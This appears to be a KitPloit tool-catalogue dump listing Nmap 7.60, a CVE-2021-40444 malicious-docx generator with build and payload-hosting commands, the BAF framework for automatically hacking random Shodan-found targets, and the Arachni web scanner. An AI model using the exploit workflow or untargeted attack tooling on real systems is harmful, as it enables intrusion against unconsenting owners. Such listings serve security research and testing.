( [ Ndiff ](<https://nmap.org/ndiff/>) ), and a packet generation and response analysis tool ( [ Nping ](<https://nmap.org/nping/>) ). \n\n \n\n\nNmap was named \u201cSecurity Product of the Year\u201d by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in [ twelve movies ](<https://nmap.org/movies/>) , including [ The Matrix Reloaded ](<https://nmap.org/movies/#matrix>) , [ Die Hard 4 ](<https://nmap.org/movies/#diehard4>) , [ Girl With the Dragon Tattoo ](<https://nmap.org/movies/#gwtdt>) , and [ The Bourne Ultimatum ](<https://nmap.org/movies/#bourne>) . \n\n \n\n\n** Features **\n\n * ** Flexible ** : Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many [ port scanning ](<https://nmap.org/book/man-port-scanning-techniques.html>) mechanisms (both TCP & UDP), [ OS detection ](<https://nmap.org/book/osdetect.html>) , [ version detection ](<https://nmap.org/book/vscan.html>) , ping sweeps, and more. See the [ documentation page ](<https://nmap.org/docs.html>) . \n * ** Powerful ** : Nmap has been used to scan huge networks of literally hundreds of thousands of machines. \n * ** Portable ** : Most operating systems are supported, including Linux , Microsoft Windows , FreeBSD , OpenBSD , Solaris , IRIX , Mac OS X , HP-UX , NetBSD , Sun OS , Amiga , and more. \n * ** Easy ** : While Nmap offers a rich set of advanced features for power users, you can start out as simply as \"nmap -v -A _ targethost _ \". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source. \n * ** Free ** : The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for [ free download ](<https://nmap.org/download.html>) , and also comes with full source code that you may modify and redistribute under the terms of the [ license ](<https://nmap.org/data/COPYING>) . \n * ** Well Documented ** : Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages [ here ](<https://nmap.org/docs.html>) . \n * ** Supported ** : While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the [ Nmap mailing lists ](<https://nmap.org/#lists>) . Most bug reports and questions should be sent to the [ nmap-dev list ](<http://seclists.org/nmap-dev>) , but only after you read the [ guidelines ](<https://nmap.org/book/man-bugs.html>) . We recommend that all users subscribe to the low-traffic [ nmap-hackers ](<http://seclists.org/nmap-hackers>) announcement list. You can also find Nmap on [ Facebook ](<https://facebook.com/nmap>) and [ Twitter ](<https://twitter.com/nmap>) . For real-time chat, join the #nmap channel on [ Freenode ](<https://freenode.net/>) or [ EFNet ](<http://www.efnet.org/>) . \n * ** Acclaimed ** : Nmap has won numerous awards, including \"Information Security Product of the Year\" by Linux Journal , Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the [ press page ](<https://nmap.org/nmap_inthenews.html>) for further details. \n * ** Popular ** : Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities. \n\n \n\n\n** Changelog **\n\n \n\n \n \n \u2022 [Windows] Updated the bundled Npcap from 0.91 to 0.93, fixing several\n issues with installation and compatibility with the Windows 10 Creators\n Update.\n \n \u2022 [NSE][GH#910] NSE scripts now have complete SSH support via libssh2,\n including password brute-forcing and running remote commands, thanks to the\n combined efforts of three Summer of Code students: [Devin Bjelland, Sergey\n Khegay, Evangelos Deirmentzoglou]\n \n \u2022 [NSE] Added 14 NSE scripts from 6 authors, bringing the total up to 579!\n They are all listed at https://nmap.org/nsedoc/, and the summaries are\n below:\n \n - ftp-syst sends SYST and STAT commands to FTP servers to get system\n version and connection information. [Daniel Miller]\n - [GH#916] http-vuln-cve2017-8917 checks for an SQL injection\n vulnerability affecting Joomla! 3.7.x before 3.7.1. [Wong Wai Tuck]\n - iec-identify probes for the IEC 60870-5-104 SCADA protocol. [Aleksandr\n Timorin, Daniel Miller]\n - [GH#915] openwebnet-discovery retrieves device identifying information\n and number of connected devices running on openwebnet protocol. [Rewanth\n Cool]\n - puppet-naivesigning checks for a misconfiguration in the Puppet CA\n where naive signing is enabled, allowing for any CSR to be automatically\n signed. [Wong Wai Tuck]\n - [GH#943] smb-protocols discovers if a server supports dialects NT LM\n 0.12 (SMBv1), 2.02, 2.10, 3.00, 3.02 and 3.11. This replaces the old\n smbv2-enabled script. [Paulino Calderon]\n - [GH#943] smb2-capabilities lists the supported capabilities of\n SMB2/SMB3 servers. [Paulino Calderon]\n - [GH#943] smb2-time determines the current date and boot date of SMB2\n servers. [Paulino Calderon]\n - [GH#943] smb2-security-mode determines the message signing\n configuration of SMB2/SMB3 servers. [Paulino Calderon]\n - [GH#943] smb2-vuln-uptime attempts to discover missing critical\n patches in Microsoft Windows systems based on the SMB2 server uptime.\n [Paulino Calderon]\n - ssh-auth-methods lists the authentication methods offered by an SSH\n server. [Devin Bjelland]\n - ssh-brute performs brute-forcing of SSH password credentials. [Devin\n Bjelland]\n - ssh-publickey-acceptance checks public or private keys to see if they\n could be used to log in to a target. A list of known-compromised key pairs\n is included and checked by default. [Devin Bjelland]\n - ssh-run uses user-provided credentials to run commands on targets via\n SSH. [Devin Bjelland]\n \n \u2022 [NSE] Removed smbv2-enabled, which was incompatible with the new SMBv2/3\n improvements. It was fully replaced by the smb-protocols script.\n \n \u2022 [Ncat][GH#446] Added Datagram TLS (DTLS) support to Ncat in connect\n (client) mode with --udp --ssl. Also added Application Layer Protocol\n Negotiation (ALPN) support with the --ssl-alpn option. [Denis Andzakovic,\n Daniel Miller]\n \n \u2022 Updated the default ciphers list for Ncat and the secure ciphers list for\n Nsock to use \"!aNULL:!eNULL\" instead of \"!ADH\". With the addition of ECDH\n ciphersuites, anonymous ECDH suites were being allowed. [Daniel Miller]\n \n \u2022 [NSE][GH#930] Fix ndmp-version and ndmp-fs-info when scanning Veritas\n Backup Exec Agent 15 or 16. [Andrew Orr]\n \n \u2022 [NSE][GH#943] Added new SMB2/3 library and related scripts. [Paulino\n Calderon]\n \n \u2022 [NSE][GH#950] Added wildcard detection to dns-brute. Only hostnames that\n resolve to unique addresses will be listed. [Aaron Heesakkers]\n \n \u2022 [NSE] FTP scripts like ftp-anon and ftp-brute now correctly handle\n TLS-protected FTP services and use STARTTLS when necessary. [Daniel Miller]\n \n \u2022 [NSE][GH#936] Function url.escape no longer encodes so-called\n \"unreserved\" characters, including hyphen, period, underscore, and tilde,\n as per RFC 3986. [nnposter]\n \n \u2022 [NSE][GH#935] Function http.pipeline_go no longer assumes that persistent\n connections are supported on HTTP 1.0 target (unless the target explicitly\n declares otherwise), as per RFC 7230. [nnposter]\n \n \u2022 [NSE][GH#934] The HTTP response object has a new member, version, which\n contains the HTTP protocol version string returned by the server, e.g.\n \"1.0\". [nnposter]\n \n \u2022 [NSE][GH#938] Fix handling of the objectSID Active Directory attribute by\n ldap.lua. [Tom Sellers]\n \n \u2022 [NSE] Fix line endings in the list of Oracle SIDs used by\n oracle-sid-brute. Carriage Return characters were being sent in the\n connection packets, likely resulting in failure of the script. [Anant\n Shrivastava]\n \n \u2022 [NSE][GH#141] http-useragent-checker now checks for changes in HTTP\n status (usually 403 Forbidden) in addition to redirects to indicate\n forbidden User Agents. [Gyanendra Mishra]\n\n \n \n\n\n[ ** Download Nmap 7.60 ** ](<https://nmap.org/download.html>)\n", "cvss3": {}, "published": "2017-08-02T15:09:00", "type": "kitploit", "title": "Nmap 7.60 - Free Security Scanner For Network Exploration & Security Audits", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-02T15:09:00", "id": "KITPLOIT:2590785192528609562", "href": "http://www.kitploit.com/2017/08/nmap-760-free-security-scanner-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-07T12:01:40", "description": "[](<https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png>)\n\n \n\n\nMalicious docx [generator](<https://www.kitploit.com/search/label/Generator> \"generator\" ) to exploit CVE-2021-40444 (Microsoft Office Word [Remote](<https://www.kitploit.com/search/label/Remote> \"Remote\" ) Code Execution)\n\n \n\n\nCreation of this Script is based on some [reverse engineering](<https://www.kitploit.com/search/label/Reverse%20Engineering> \"reverse engineering\" ) over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)\n\nYou need to install lcab first (`sudo apt-get install lcab`)\n\nCheck `REPRODUCE.md` for manual reproduce steps\n\nIf your generated cab is not working, try pointing out exploit.html URL to calc.cab\n\n \n**Using** \n\n\nFirst generate a malicious docx document given a DLL, you can use the one at `test/calc.dll` which just pops a `calc.exe` from a call to `system()`\n\n`python3 exploit.py generate test/calc.dll http://<SRV IP>`\n\n \n\n\n[](<https://1.bp.blogspot.com/-SdaSc2Sass4/YUNCYPNXwRI/AAAAAAAAunc/W83xraioxaEnxgZSQFj1eb2ZTdAcBiGOQCNcBGAsYHQ/s1007/CVE-2021-40444_1_gen.png>)\n\n \n\n\nOnce you generate the malicious docx (will be at `out/`) you can setup the server:\n\n`sudo python3 exploit.py host 80`\n\n \n\n\n[](<https://1.bp.blogspot.com/-gTFup3vQ5eo/YUNCbV0QDBI/AAAAAAAAung/wvEOAQCmfakkFniNlJocSglFbVacX3S6QCNcBGAsYHQ/s866/CVE-2021-40444_2_srv.png>)\n\n \n\n\nFinally try the docx in a [Windows](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) Virtual Machine:\n\n[](<https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png>)\n\n \n\n\n**[Download CVE-2021-40444](<https://github.com/lockedbyte/CVE-2021-40444> \"Download CVE-2021-40444\" )**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T13:13:00", "type": "kitploit", "title": "CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-16T13:13:11", "id": "KITPLOIT:3697667464193804316", "href": "http://www.kitploit.com/2021/09/cve-2021-40444-poc-malicious-docx.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-20T14:43:12", "description": "[  ](<https://2.bp.blogspot.com/-DeNDGB-ITY4/WXi0g75R6qI/AAAAAAAAIZ8/dw4CFYD0j3sligo6wlR5bAxJcdEO6_OYgCLcBGAs/s1600/BAF_01.png>)\n\n** \n** ** What is BAF ? ** \n\n\n * it's a framework written in python [2.7] that is being made specially for blind attacking , ie : attacking random targets with common security issues , targets are generated by the hackers search engine [ \"shodan\" ](<https://www.shodan.io/explore>) and vulnerable hosts are hacked in an automated way . \n\n * this framework is completely \"neutral\" ie: it's not based on shodan API and it has total dependence on web scraping , ie: the only limit on what you can do with it is your immagination as a tester & our programming skills as contributers/owners . \n\n\n \n\n\n** how to use BAF ? ** \n\n\n * fire up a terminal and sudo apt-get update && apt-get upgrade && apt-get dist-upgrade \n * install [ requests , httplib , urllib , time , bs4 \"BeautifulSoup\" , colored , selenium , sys ] python modules \n * python BAF_0.1.0.py \n * enter your shodan's account username and pass \n * choose 1 , let it do it's job , press y , close the previous tab , press y ,close the previous tabs ...etc till u have the vulnerable cams only \n * choose 2 , enter what do u want to search for (ie: NSA) , when it's done , refer to the targets text file , it will contain the targets ip:port \n * that's all , till now :) \n * DON'T close a loading webpage \n * beta versions will make automated browser open for better understanding ,but you can close the webcam tabs freely \n\n \n\n\n** Screenshots ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-f33kWc8Go3g/WXi0vciPLAI/AAAAAAAAIaA/CjzkNCcnwXwB1c3RQCef_AOSIHIv5ciiwCLcBGAs/s1600/BAF_02.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-DArfUxY0QsE/WXi0vZnq2uI/AAAAAAAAIaE/liF0K-d94k0tyMwV9We5B7ujocNjypJWQCLcBGAs/s1600/BAF_03.png>)\n\n \n \n\n\n** [ Download BAF ](<https://github.com/engMaher/BAF>) **\n", "cvss3": {}, "published": "2017-08-03T15:07:00", "type": "kitploit", "title": "BAF - Blind Attacking Framework", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-03T15:07:00", "id": "KITPLOIT:3456474172768099634", "href": "http://www.kitploit.com/2017/08/baf-blind-attacking-framework.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-20T08:38:18", "description": "[  ](<https://1.bp.blogspot.com/-aKbQJX4OmHA/WXinyzhSAqI/AAAAAAAAIY0/m0l8n-8lq_EWaS6ycx1I8lER1Mt91S78QCLcBGAs/s1600/Arachni.png>)\n\n \n\n\nArachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. \n\nIt is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives. \n\nUnlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application\u2019s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly. \n\nMoreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX. \n\nFinally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform. \n\n** Note ** : Despite the fact that Arachni is mostly targeted towards web application security, it can easily be used for general purpose scraping, data-mining, etc. with the addition of custom components. \n\n \n\n\n** Arachni offers: **\n\n \n\n\n** A stable, efficient, high-performance framework **\n\n` Check ` , ` report ` and ` plugin ` developers are allowed to easily and quickly create and deploy their components with the minimum amount of restrictions imposed upon them, while provided with the necessary infrastructure to accomplish their goals. \n\nFurthermore, they are encouraged to take full advantage of the Ruby language under a unified framework that will increase their productivity without stifling them or complicating their tasks. \n\nMoreover, that same framework can be utilized as any other Ruby library and lead to the development of brand new scanners or help you create highly customized scan/audit scenarios and/or scripted scans. \n\n \n\n\n** Simplicity **\n\nAlthough some parts of the Framework are fairly complex you will never have to deal them directly. >From a user\u2019s or a component developer\u2019s point of view everything appears simple and straight-forward all the while providing power, performance and flexibility. \n\nFrom the simple command-line utility scanner to the intuitive and user-friendly Web interface and collaboration platform, Arachni follows the principle of least surprise and provides you with plenty of feedback and guidance. \n\n \n\n\n** In simple terms **\n\nArachni is designed to automatically detect security issues in web applications. All it expects is the URL of the target website and after a while it will present you with its findings. \n\n \n\n\n** Features **\n\n \n\n\n** General **\n\n * Cookie-jar/cookie-string support. \n * Custom header support. \n * SSL support with fine-grained options. \n * User Agent spoofing. \n * Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0. \n * Proxy authentication. \n * Site authentication (SSL-based, form-based, Cookie-Jar, Basic-Digest, NTLMv1, Kerberos and others). \n * Automatic log-out detection and re-login during the scan (when the initial login was performed via the ` autologin ` , ` login_script ` or ` proxy ` plugins). \n * Custom 404 page detection. \n * UI abstraction: \n\n * [ Command-line Interface ](<https://github.com/Arachni/arachni/wiki/Executables>) . \n * [ Web User Interface ](<https://github.com/Arachni/arachni-ui-web>) . \n * Pause/resume functionality. \n * Hibernation support -- Suspend to and restore from disk. \n * High performance asynchronous HTTP requests. \n\n * With adjustable concurrency. \n * With the ability to auto-detect server health and adjust its concurrency automatically. \n * Support for custom default input values, using pairs of patterns (to be matched against input names) and values to be used to fill in matching inputs. \n\n \n\n\n** Integrated browser environment **\n\nArachni includes an integrated, real browser environment in order to provide sufficient coverage to modern web applications which make use of technologies such as HTML5, JavaScript, DOM manipulation, AJAX, etc. \n\nIn addition to the monitoring of the vanilla DOM and JavaScript environments, Arachni's browsers also hook into popular frameworks to make the logged data easier to digest: \n\n * [ JQuery ](<https://jquery.com/>)\n * [ AngularJS ](<https://angularjs.org/>)\n * More to come... \n\nIn essence, this turns Arachni into a DOM and JavaScript debugger, allowing it to monitor DOM events and JavaScript data and execution flows. As a result, not only can the system trigger and identify DOM-based issues, but it will accompany them with a great deal of information regarding the state of the page at the time. \n\nRelevant information include: \n\n * Page DOM, as HTML code. \n\n * With a list of DOM transitions required to restore the state of the page to the one at the time it was logged. \n * Original DOM (i.e. prior to the action that caused the page to be logged), as HTML code. \n\n * With a list of DOM transitions. \n * Data-flow sinks -- Each sink is a JS method which received a tainted argument. \n\n * Parent object of the method (ex.: ` DOMWindow ` ). \n * Method signature (ex.: ` decodeURIComponent() ` ). \n * Arguments list. \n\n * With the identified taint located recursively in the included objects. \n * Method source code. \n * JS stacktrace. \n * Execution flow sinks -- Each sink is a successfully executed JS payload, as injected by the security checks. \n\n * Includes a JS stacktrace. \n * JavaScript stack-traces include: \n\n * Method names. \n * Method locations. \n * Method source codes. \n * Argument lists. \n\nIn essence, you have access to roughly the same information that your favorite debugger (for example, FireBug) would provide, as if you had set a breakpoint to take place at the right time for identifying an issue. \n\n \n\n\n** Browser-cluster **\n\nThe browser-cluster is what coordinates the browser analysis of resources and allows the system to perform operations which would normally be quite time consuming in a high-performance fashion. \n\nConfiguration options include: \n\n * Adjustable pool-size, i.e. the amount of browser workers to utilize. \n * Timeout for each job. \n * Worker TTL counted in jobs -- Workers which exceed the TTL have their browser process respawned. \n * Ability to disable loading images. \n * Adjustable screen width and height. \n\n * Can be used to analyze responsive and mobile applications. \n * Ability to wait until certain elements appear in the page. \n * Configurable local storage data. \n\n \n\n\n** Coverage **\n\nThe system can provide great coverage to modern web applications due to its integrated browser environment. This allows it to interact with complex applications that make heavy use of client-side code (like JavaScript) just like a human would. \n\nIn addition to that, it also knows about which browser state changes the application has been programmed to handle and is able to trigger them programatically in order to provide coverage for a full set of possible scenarios. \n\nBy inspecting all possible pages and their states (when using client-side code) Arachni is able to extract and audit the following elements and their inputs: \n\n * Forms \n\n * Along with ones that require interaction via a real browser due to DOM events. \n * User-interface Forms \n\n * Input and button groups which don't belong to an HTML ` <form> ` element but are instead associated via JS code. \n * User-interface Inputs \n\n * Orphan ` <input> ` elements with associated DOM events. \n * Links \n\n * Along with ones that have client-side parameters in their fragment, i.e.: ` http://example.com/#/?param=val¶m2=val2 `\n * With support for rewrite rules. \n * LinkTemplates -- Allowing for extraction of arbitrary inputs from generic paths, based on user-supplied templates -- useful when rewrite rules are not available. \n\n * Along with ones that have client-side parameters in their URL fragments, i.e.: ` http://example.com/#/param/val/param2/val2 `\n * Cookies \n * Headers \n * Generic client-side elements which have associated DOM events. \n * AJAX-request parameters. \n * JSON request data. \n * XML request data. \n\n \n\n\n** Open [ distributed architecture ](<https://github.com/Arachni/arachni/wiki/Distributed-components>) **\n\nArachni is designed to fit into your workflow and easily integrate with your existing infrastructure. \n\nDepending on the level of control you require over the process, you can either choose the REST service or the custom RPC protocol. \n\nBoth approaches allow you to: \n\n * Remotely monitor and manage scans. \n * Perform multiple scans at the same time -- Each scan is compartmentalized to its own OS process to take advantage of: \n\n * Multi-core/SMP architectures. \n * OS-level scheduling/restrictions. \n * Sandboxed failure propagation. \n * Communicate over a secure channel. \n\n \n\n\n** [ REST API ](<https://github.com/Arachni/arachni/wiki/REST-API>) **\n\n * Very simple and straightforward API. \n * Easy interoperability with non-Ruby systems. \n\n * Operates over HTTP. \n * Uses JSON to format messages. \n * Stateful scan monitoring. \n\n * Unique sessions automatically only receive updates when polling for progress, rather than full data. \n\n \n\n\n** [ RPC API ](<https://github.com/Arachni/arachni/wiki/RPC-API>) **\n\n * High-performance/low-bandwidth [ communication protocol ](<https://github.com/Arachni/arachni-rpc>) . \n\n * ` MessagePack ` serialization for performance, efficiency and ease of integration with 3rd party systems. \n * Grid: \n\n * Self-healing. \n * Scale up/down by hot-plugging/hot-unplugging nodes. \n\n * Can scale up infinitely by adding nodes to increase scan capacity. \n * _ (Always-on) _ Load-balancing -- All Instances are automatically provided by the least burdened Grid member. \n\n * With optional per-scan opt-out/override. \n * _ (Optional) _ High-Performance mode -- Combines the resources of multiple nodes to perform multi-Instance scans. \n\n * Enabled on a per-scan basis. \n\n \n\n\n** Scope configuration **\n\n * Filters for redundant pages like galleries, catalogs, etc. based on regular expressions and counters. \n\n * Can optionally detect and ignore redundant pages automatically. \n * URL exclusion filters using regular expressions. \n * Page exclusion filters based on content, using regular expressions. \n * URL inclusion filters using regular expressions. \n * Can be forced to only follow HTTPS paths and not downgrade to HTTP. \n * Can optionally follow subdomains. \n * Adjustable page count limit. \n * Adjustable redirect limit. \n * Adjustable directory depth limit. \n * Adjustable DOM depth limit. \n * Adjustment using URL-rewrite rules. \n * Can read paths from multiple user supplied files (to both restrict and extend the scope). \n\n \n\n\n** Audit **\n\n * Can audit: \n\n * Forms \n\n * Can automatically refresh nonce tokens. \n * Can submit them via the integrated browser environment. \n * User-interface Forms \n\n * Input and button groups which don't belong to an HTML ` <form> ` element but are instead associated via JS code. \n * User-interface Inputs \n\n * Orphan ` <input> ` elements with associated DOM events. \n * Links \n\n * Can load them via the integrated browser environment. \n * LinkTemplates \n\n * Can load them via the integrated browser environment. \n * Cookies \n\n * Can load them via the integrated browser environment. \n * Headers \n * Generic client-side DOM elements. \n * JSON request data. \n * XML request data. \n * Can ignore binary/non-text pages. \n * Can audit elements using both ` GET ` and ` POST ` HTTP methods. \n * Can inject both raw and HTTP encoded payloads. \n * Can submit all links and forms of the page along with the cookie permutations to provide extensive cookie-audit coverage. \n * Can exclude specific input vectors by name. \n * Can include specific input vectors by name. \n\n \n\n\n** Components **\n\nArachni is a highly modular system, employing several components of distinct types to perform its duties. \n\nIn addition to enabling or disabling the bundled components so as to adjust the system's behavior and features as needed, functionality can be extended via the addition of user-created components to suit almost every need. \n\n \n\n\n** Platform fingerprinters **\n\nIn order to make efficient use of the available bandwidth, Arachni performs rudimentary platform fingerprinting and tailors the audit process to the server-side deployed technologies by only using applicable payloads. \n\nCurrently, the following platforms can be identified: \n\n * Operating systems \n\n * BSD \n * Linux \n * Unix \n * Windows \n * Solaris \n * Web servers \n\n * Apache \n * IIS \n * Nginx \n * Tomcat \n * Jetty \n * Gunicorn \n * Programming languages \n\n * PHP \n * ASP \n * ASPX \n * Java \n * Python \n * Ruby \n * Frameworks \n\n * Rack \n * CakePHP \n * Rails \n * Django \n * ASP.NET MVC \n * JSF \n * CherryPy \n * Nette \n * Symfony \n\nThe user also has the option of specifying extra platforms (like a DB server) in order to help the system be as efficient as possible. Alternatively, fingerprinting can be disabled altogether. \n\nFinally, Arachni will always err on the side of caution and send all available payloads when it fails to identify specific platforms. \n\n \n\n\n** Checks **\n\n_ Checks _ are system components which perform security checks and log issues. \n\n \n\n\n** Active **\n\nActive checks engage the web application via its inputs. \n\n * SQL injection ( ` sql_injection ` ) -- Error based detection. \n\n * Oracle \n * InterBase \n * PostgreSQL \n * MySQL \n * MSSQL \n * EMC \n * SQLite \n * DB2 \n * Informix \n * Firebird \n * SaP Max DB \n * Sybase \n * Frontbase \n * Ingres \n * HSQLDB \n * MS Access \n * Blind SQL injection using differential analysis ( ` sql_injection_differential ` ). \n * Blind SQL injection using timing attacks ( ` sql_injection_timing ` ). \n\n * MySQL \n * PostgreSQL \n * MSSQL \n * NoSQL injection ( ` no_sql_injection ` ) -- Error based vulnerability detection. \n\n * MongoDB \n * Blind NoSQL injection using differential analysis ( ` no_sql_injection_differential ` ). \n * CSRF detection ( ` csrf ` ). \n * Code injection ( ` code_injection ` ). \n\n * PHP \n * Ruby \n * Python \n * Java \n * ASP \n * Blind code injection using timing attacks ( ` code_injection_timing ` ). \n\n * PHP \n * Ruby \n * Python \n * Java \n * ASP \n * LDAP injection ( ` ldap_injection ` ). \n * Path traversal ( ` path_traversal ` ). \n\n * *nix \n * Windows \n * Java \n * File inclusion ( ` file_inclusion ` ). \n\n * *nix \n * Windows \n * Java \n * PHP \n * Perl \n * Response splitting ( ` response_splitting ` ). \n * OS command injection ( ` os_cmd_injection ` ). \n\n * *nix \n * *BSD \n * IBM AIX \n * Windows \n * Blind OS command injection using timing attacks ( ` os_cmd_injection_timing ` ). \n\n * Linux \n * *BSD \n * Solaris \n * Windows \n * Remote file inclusion ( ` rfi ` ). \n * Unvalidated redirects ( ` unvalidated_redirect ` ). \n * Unvalidated DOM redirects ( ` unvalidated_redirect_dom ` ). \n * XPath injection ( ` xpath_injection ` ). \n\n * Generic \n * PHP \n * Java \n * dotNET \n * libXML2 \n * XSS ( ` xss ` ). \n * Path XSS ( ` xss_path ` ). \n * XSS in event attributes of HTML elements ( ` xss_event ` ). \n * XSS in HTML tags ( ` xss_tag ` ). \n * XSS in script context ( ` xss_script_context ` ). \n * DOM XSS ( ` xss_dom ` ). \n * DOM XSS script context ( ` xss_dom_script_context ` ). \n * Source code disclosure ( ` source_code_disclosure ` ) \n * XML External Entity ( ` xxe ` ). \n\n * Linux \n * *BSD \n * Solaris \n * Windows \n\n \n\n\n** Passive **\n\nPassive checks look for the existence of files, folders and signatures. \n\n * Allowed HTTP methods ( ` allowed_methods ` ). \n * Back-up files ( ` backup_files ` ). \n * Backup directories ( ` backup_directories ` ) \n * Common administration interfaces ( ` common_admin_interfaces ` ). \n * Common directories ( ` common_directories ` ). \n * Common files ( ` common_files ` ). \n * HTTP PUT ( ` http_put ` ). \n * Insufficient Transport Layer Protection for password forms ( ` unencrypted_password_form ` ). \n * WebDAV detection ( ` webdav ` ). \n * HTTP TRACE detection ( ` xst ` ). \n * Credit Card number disclosure ( ` credit_card ` ). \n * CVS/SVN user disclosure ( ` cvs_svn_users ` ). \n * Private IP address disclosure ( ` private_ip ` ). \n * Common backdoors ( ` backdoors ` ). \n * .htaccess LIMIT misconfiguration ( ` htaccess_limit ` ). \n * Interesting responses ( ` interesting_responses ` ). \n * HTML object grepper ( ` html_objects ` ). \n * E-mail address disclosure ( ` emails ` ). \n * US Social Security Number disclosure ( ` ssn ` ). \n * Forceful directory listing ( ` directory_listing ` ). \n * Mixed Resource/Scripting ( ` mixed_resource ` ). \n * Insecure cookies ( ` insecure_cookies ` ). \n * HttpOnly cookies ( ` http_only_cookies ` ). \n * Auto-complete for password form fields ( ` password_autocomplete ` ). \n * Origin Spoof Access Restriction Bypass ( ` origin_spoof_access_restriction_bypass ` ) \n * Form-based upload ( ` form_upload ` ) \n * localstart.asp ( ` localstart_asp ` ) \n * Cookie set for parent domain ( ` cookie_set_for_parent_domain ` ) \n * Missing ` Strict-Transport-Security ` headers for HTTPS sites ( ` hsts ` ). \n * Missing ` X-Frame-Options ` headers ( ` x_frame_options ` ). \n * Insecure CORS policy ( ` insecure_cors_policy ` ). \n * Insecure cross-domain policy (allow-access-from) ( ` insecure_cross_domain_policy_access ` ) \n * Insecure cross-domain policy (allow-http-request-headers-from) ( ` insecure_cross_domain_policy_headers ` ) \n * Insecure client-access policy ( ` insecure_client_access_policy ` ) \n\n \n\n\n** Reporters **\n\n * Standard output \n * [ HTML ](<http://www.arachni-scanner.com/reports/report.html/>) ( [ zip ](<http://www.arachni-scanner.com/reports/report.html.zip>) ) ( ` html ` ). \n * [ XML ](<http://www.arachni-scanner.com/reports/report.xml>) ( ` xml ` ). \n * [ Text ](<http://www.arachni-scanner.com/reports/report.txt>) ( ` text ` ). \n * [ JSON ](<http://www.arachni-scanner.com/reports/report.json>) ( ` json ` ) \n * [ Marshal ](<http://www.arachni-scanner.com/reports/report.marshal>) ( ` marshal ` ) \n * [ YAML ](<http://www.arachni-scanner.com/reports/report.yml>) ( ` yaml ` ) \n * [ AFR ](<http://www.arachni-scanner.com/reports/report.afr>) ( ` afr ` ) \n\n * The default Arachni Framework Report format. \n\n \n\n\n** Plugins **\n\nPlugins add extra functionality to the system in a modular fashion, this way the core remains lean and makes it easy for anyone to add arbitrary functionality. \n\n * Passive Proxy ( ` proxy ` ) -- Analyzes requests and responses between the web app and the browser assisting in AJAX audits, logging-in and/or restricting the scope of the audit. \n * Form based login ( ` autologin ` ). \n * Script based login ( ` login_script ` ). \n * Dictionary attacker for HTTP Auth ( ` http_dicattack ` ). \n * Dictionary attacker for form based authentication ( ` form_dicattack ` ). \n * Cookie collector ( ` cookie_collector ` ) -- Keeps track of cookies while establishing a timeline of changes. \n * WAF (Web Application Firewall) Detector ( ` waf_detector 